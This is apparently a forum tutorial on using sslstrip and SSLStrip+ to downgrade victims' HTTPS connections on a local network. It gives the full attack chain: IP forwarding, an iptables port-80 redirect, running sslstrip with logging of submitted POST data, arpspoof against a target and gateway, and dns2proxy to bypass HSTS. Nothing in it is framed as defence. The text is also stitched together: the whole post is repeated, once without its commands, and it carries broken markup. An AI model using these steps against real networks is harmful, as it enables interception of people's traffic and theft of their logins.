Good day, without further ado, straight to the point.
Description of SSLstrip
sslstrip is a tool that discreetly intercepts HTTP traffic on the network, monitors HTTPS links and redirects, and then matches those links to their HTTP counterparts or homographically similar HTTPS links. It also supports modes for serving a favicon that looks like a lock icon, selective logging, and rejecting sessions.
Official site- http://www.thoughtcrime.org/software/sslstrip/
Description of SSLStrip +
This is a new version of SSLstrip with a new feature to bypass the HTTP Strict Transport Security (HSTS) protection mechanism.
This version, like the original, changes HTTPS to HTTP plus the hostname in the html code to avoid HSTS.
In order for it to work, it also needs a DNS server that reverses the changes made by the proxy. This DNS server is dns2proxy.
Page on GitHub: https://github.com/singe/sslstrip2/
How does SSLstrip work?
First, arpspoof convinces the host that our MAC address is the MAC address of the router, and the target starts sending us all network traffic. The kernel forwards everything except traffic destined for port 80, which is forwarded to $ listenPort (10000 for example).
This is how sslstrip gets traffic and does its magic.
Installing SSLstrip
The program is preinstalled in Kali Linux.
Installing SSLstrip on Linux
Requirements:
Installation:
SSLstrip launch examples
Write results to file (-w sslstrip.log), listen on port 8080 (-l 8080):
Running sslstrip
Switch your machine to forwarding mode:
Configure iptables to redirect HTTP traffic to sslstrip:
Run sslstrip:
Run arpspoof to convince the networks that they should send their traffic to you:
[B2]SSLstrip Help[/B]
Usage: sslstrip <options>
Options:
-w <file_name>, --write = <file_name> Sets the file for the log (optional).
-p, --post Log SSL POST only. (default)
-s, --ssl Log all SSL traffic to and from the server.
-a, --all Log all SSL and HTTP traffic to and from the server.
-l <port>, --listen = <port> Listening port (default 10000).
-f, --favicon Change the site icon to a padlock for secure requests.
-k, --killsessions Kill current sessions.
-h Print this help message.
Description of SSLstrip
sslstrip is a tool that discreetly intercepts HTTP traffic on the network, monitors HTTPS links and redirects, and then matches those links to their HTTP counterparts or homographically similar HTTPS links. It also supports modes for serving a favicon that looks like a lock icon, selective logging, and rejecting sessions.
Official site- http://www.thoughtcrime.org/software/sslstrip/
Description of SSLStrip +
This is a new version of SSLstrip with a new feature to bypass the HTTP Strict Transport Security (HSTS) protection mechanism.
This version, like the original, changes HTTPS to HTTP plus the hostname in the html code to avoid HSTS.
In order for it to work, it also needs a DNS server that reverses the changes made by the proxy. This DNS server is dns2proxy.
Page on GitHub: https://github.com/singe/sslstrip2/
How does SSLstrip work?
First, arpspoof convinces the host that our MAC address is the MAC address of the router, and the target starts sending us all network traffic. The kernel forwards everything except traffic destined for port 80, which is forwarded to $ listenPort (10000 for example).
This is how sslstrip gets traffic and does its magic.
Installing SSLstrip
The program is preinstalled in Kali Linux.
Installing SSLstrip on Linux
Requirements:
- Python> = 2.5 (apt-get install python)
- Python module "twisted-web" (apt-get install python-twisted-web)
Installation:
Code:
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional)
sudo python ./setup.py installSSLstrip launch examples
Write results to file (-w sslstrip.log), listen on port 8080 (-l 8080):
Code:
sslstrip -w sslstrip.log -l 8080Running sslstrip
Switch your machine to forwarding mode:
Code:
echo "1"> / proc / sys / net / ipv4 / ip_forwardConfigure iptables to redirect HTTP traffic to sslstrip:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>Run sslstrip:
Code:
sslstrip.py -l <listenPort>Run arpspoof to convince the networks that they should send their traffic to you:
Code:
arpspoof -i <interface> -t <targetIP> <gatewayIP>[B2]SSLstrip Help[/B]
Usage: sslstrip <options>
Options:
-w <file_name>, --write = <file_name> Sets the file for the log (optional).
-p, --post Log SSL POST only. (default)
-s, --ssl Log all SSL traffic to and from the server.
-a, --all Log all SSL and HTTP traffic to and from the server.
-l <port>, --listen = <port> Listening port (default 10000).
-f, --favicon Change the site icon to a padlock for secure requests.
-k, --killsessions Kill current sessions.
-h Print this help message.